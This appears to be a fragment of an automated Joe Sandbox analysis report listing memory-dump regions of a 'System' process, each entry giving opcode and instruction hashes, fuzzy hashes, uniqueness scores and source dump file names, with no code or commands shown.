                                                          • API String ID:
                                                          • Opcode ID: f90495b0b1714a1721e50def2ec2840a8541c050d9d40f2b00912d1b041f793c
                                                          • Instruction ID: 5e847d53d35650fe06bdfacb0cfe25f41403e1b45591a12990fa3659ccc5d55b
                                                          • Opcode Fuzzy Hash: f90495b0b1714a1721e50def2ec2840a8541c050d9d40f2b00912d1b041f793c
                                                          • Instruction Fuzzy Hash: 70F0863092C7419B834CDF188482426B7F5FF99B04F50993DF19A53292DB75F8018A83
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc4d6b448c93dccd987ead41a753a15b26c4da95f4fc39a0b08d4244e9ede5ac
                                                          • Instruction ID: d3093aeb812da9e3ed48504419b761ff1bc149159ba7dc35c85d344262e1488a
                                                          • Opcode Fuzzy Hash: bc4d6b448c93dccd987ead41a753a15b26c4da95f4fc39a0b08d4244e9ede5ac
                                                          • Instruction Fuzzy Hash: 7DF0FF30E1965A8EEBA9E72898553E9B3A6FF89304F0081FAD00DD2295DF7469818A40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 914400567d9488249b17f683938b107ca55030764037cfdeeecc8811415ab9d1
                                                          • Instruction ID: 7982f3cad94227f001c422751624496d77e0b1957d2f2b30016fef2766a6e024
                                                          • Opcode Fuzzy Hash: 914400567d9488249b17f683938b107ca55030764037cfdeeecc8811415ab9d1
                                                          • Instruction Fuzzy Hash: 97F08232B0840647D71CEF79882257AB3C7EBC5310B55C63EC11AC77E5ED78E5468641
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9cf0fc2a9116ef4c20e4e3e2af04ee5beb833ebc6e4f44e6cfc2399a030d77a7
                                                          • Instruction ID: 3096403ac62aeda263291864b2633555990482f7a2eba9cda1d87474844938df
                                                          • Opcode Fuzzy Hash: 9cf0fc2a9116ef4c20e4e3e2af04ee5beb833ebc6e4f44e6cfc2399a030d77a7
                                                          • Instruction Fuzzy Hash: BAE09272A1C50A4B871CAA14A85B6BD73CAE796310F14D27ECA5BC23F2FE58A5460486
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62fc8fc9e88958415accbca3d9f6664e13f71a1eacbdd36317b0b3b90e123167
                                                          • Instruction ID: 5ce115a7e275e665e3a73b448f52b916c0e56ec0699300662f749ef03c320feb
                                                          • Opcode Fuzzy Hash: 62fc8fc9e88958415accbca3d9f6664e13f71a1eacbdd36317b0b3b90e123167
                                                          • Instruction Fuzzy Hash: 07F0D030A2C7459B8748EB68809252A73E5FBC5700F50583DF59A833A1DA75B8018A47
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 660e40622357a06ecd437732c37d2fcfaf7689aceb29861a44a766ff98bb08a4
                                                          • Instruction ID: 7ac9dd01abb6b3703fd6933859295bf0e672fc7023d4f9c77c094989a17dd0e9
                                                          • Opcode Fuzzy Hash: 660e40622357a06ecd437732c37d2fcfaf7689aceb29861a44a766ff98bb08a4
                                                          • Instruction Fuzzy Hash: EAF0A031F0860B4BCB1DEA7084915BA7296DB91300B50C63EC227C7BF6FC68B5018300
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe17e32b554f156a10f63787281b4239245fe90634444ed0b175a692555b2aac
                                                          • Instruction ID: 85f7dc4025da333d18efaf7f7e6bc8d223965bc9e35e604609e9410b1ca39eb6
                                                          • Opcode Fuzzy Hash: fe17e32b554f156a10f63787281b4239245fe90634444ed0b175a692555b2aac
                                                          • Instruction Fuzzy Hash: DEE02230A08A0547D368962A9800669B2D6EFC8350B54083DE419C33A4DD75BCC2C380
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca7a64564512b22b1041ebae364c418aecda9e3215efd234cf9a6b59adb3c6f5
                                                          • Instruction ID: 973f39f51b1c691975ec3af25f1e75c9ed6c3578225678641ed2ed71ac24474e
                                                          • Opcode Fuzzy Hash: ca7a64564512b22b1041ebae364c418aecda9e3215efd234cf9a6b59adb3c6f5
                                                          • Instruction Fuzzy Hash: C3E09231B486074BD30ED9298A851A6B64BA7D1321764C33AC111CB2E9EC78A94A4641
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3882728f777a3242457fbd50cd8d87bcf24cfa20fb68a2e468bef4f0f79aa9d
                                                          • Instruction ID: ca070496952c33276c6a5fbf9c5926200f9c229c1ca330c211cb3218139d4982
                                                          • Opcode Fuzzy Hash: d3882728f777a3242457fbd50cd8d87bcf24cfa20fb68a2e468bef4f0f79aa9d
                                                          • Instruction Fuzzy Hash: EEE0DF71848301CBE310E664C885799B2A0FF50300F108539D1ABC23A2EBB4B5428780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ed09d48279f89a44da6a7d879ba690aab46f78ff22a11577a6f363ecdbceed3
                                                          • Instruction ID: 3835dd4687e198bee6c0b272d01f808d5ea7ca01a8cd7785bb6867c63c1ee68f
                                                          • Opcode Fuzzy Hash: 8ed09d48279f89a44da6a7d879ba690aab46f78ff22a11577a6f363ecdbceed3
                                                          • Instruction Fuzzy Hash: DCE0DF30B0860B4BD309DA5DC6801A9768BE7E1320B24C332C125CB3EDFC78A9494680
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 105a0f36c64cb4e87facda67543ad40fff80baa0753caf5f7339413f1104d3f0
                                                          • Instruction ID: fcc285ff8ffeb48662bb72047873dda4fa2e397ae3d86cd19a36416ef5625a3d
                                                          • Opcode Fuzzy Hash: 105a0f36c64cb4e87facda67543ad40fff80baa0753caf5f7339413f1104d3f0
                                                          • Instruction Fuzzy Hash: C1D0C226D0D84306FB38C05824022BC4F49CB49B60F18C27ACEAAD73E36C8C39834185
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47019774e4242b89c35eb72618880ca7ddeac83c61bca311747ce3ea9c00d84a
                                                          • Instruction ID: f26b6c6fcc559a228f6b17bb45c89631250b3615c6b886cb34c23cf2f1cd8e0b
                                                          • Opcode Fuzzy Hash: 47019774e4242b89c35eb72618880ca7ddeac83c61bca311747ce3ea9c00d84a
                                                          • Instruction Fuzzy Hash: 8DE08630A2C7414F930CDE18D8D1126B7E5EB98B04F10983DB4C7C77A1D970B8018642
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4d80c0149e310900721b47e755ab0291be48dc72e38f859563b015df5446ad6
                                                          • Instruction ID: 48d8e6ff98f748759d1de5fe1c2864ff63a0495f2fd15594f0c5765c2c986d68
                                                          • Opcode Fuzzy Hash: f4d80c0149e310900721b47e755ab0291be48dc72e38f859563b015df5446ad6
                                                          • Instruction Fuzzy Hash: 05D0A713E0D8120BEB38D05C24522680746DB98B60F59C336DE6ED77E3AC4C2D8341C1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99210c743a0cfaa71f9e4a2e768cc98b01382ac3e258f1b94509cbaaffe9b117
                                                          • Instruction ID: 9c8b50cf41b06a12f051df51785d85d7d76ca13debaf4d7fb5d77498e64b9c07
                                                          • Opcode Fuzzy Hash: 99210c743a0cfaa71f9e4a2e768cc98b01382ac3e258f1b94509cbaaffe9b117
                                                          • Instruction Fuzzy Hash: 58D05E20B1C40A07E669BF2880963BD90875FC4380F20C43FD01FC32E6CD6868020252
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction ID: 79fd7f0c995c46869005875ff5af020107171b181199931b52a4a005f8af7353
                                                          • Opcode Fuzzy Hash: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction Fuzzy Hash: A8D0A931CAC2034AD31CBA304952531712AAF89310B60E47DE18B822E3EDBAF0428642
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction ID: b42d47af76edb7c3ae7b6613411686f155f75356bf2140fda7a1a0cdb467c890
                                                          • Opcode Fuzzy Hash: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction Fuzzy Hash: 2DD0A93253C28393D308FA1488425BA3714FB20348F20642EA14BCA6A2DA14A0428A07
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction ID: 34b270941fa26d5dfd73d9db54def034668b7007f0ea39935f66ef51d0d68219
                                                          • Opcode Fuzzy Hash: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction Fuzzy Hash: 44C0123690820B87E2189A29484216072AAAB81200BA1913CE2A7C62E1EA39F8529641
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%